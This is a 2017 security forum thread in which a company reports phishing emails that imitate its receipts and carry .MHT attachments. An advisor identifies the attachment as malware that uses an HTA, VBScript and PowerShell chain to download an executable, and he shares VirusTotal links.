Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Fake Email to Customers Mimicking Email from our Company


  • Please log in to reply
3 replies to this topic

#1 smgrownc

smgrownc

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:29 AM

Posted 27 December 2017 - 02:49 PM

Within the last 48 hours, 3 customers and 1 employee of our company have received emails that mimic our E-commerce transaction receipt email very closely. The email is off very slightly but there's an attachment - extension ending is .MHT. The only thing these 4 individuals have in common that I know of is our company.

 

Has anyone seen this sort of email behavior recently and any ideas where to dig to root it out? I'm quite sure it's either malware, ransomware, or a phishing attempt.

 

Thanks in advance for any help.



BC AdBot (Login to Remove)

 


#2 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,672 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:29 AM

Posted 27 December 2017 - 05:14 PM

Have you submitted the file to VirusTotal? If so, can you share the link here?


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#3 smgrownc

smgrownc
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:29 AM

Posted 28 December 2017 - 08:53 AM

Didier - Here are the VirusTotal links to both the file and the URL/IP/Domain. The URL/IP scan in PayloadSecurity gave a falcon-threatscore of 20/100 - what does that signify to you?

 

https://www.virustotal.com/#/file/2a7a3bbb6fc2556342414a221b4bd46072b5b125866fbc7622d5c4eb8f085df0/detection

 

https://www.virustotal.com/#/search/mailto:email@customerswebmails.com



#4 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,672 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:29 AM

Posted 28 December 2017 - 05:54 PM

It's malware. The mht file has a URL to a hta file, that contains VBScript that runs a PowerShell command.

That PowerShell command downloads and executes a Windows executable.

 

It was not known by VirusTotal, I submitted it: https://www.virustotal.com/en/file/786e52d7557cde37c5b5e11a32eb4579d9c066cc3113a7048f7933ba30abfd8b/analysis/1514501304/

 

I contains a Microsoft digital signature taken from a genuine Windows executable. Don't know what id does (yet).


Edited by Didier Stevens, 28 December 2017 - 05:58 PM.

Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users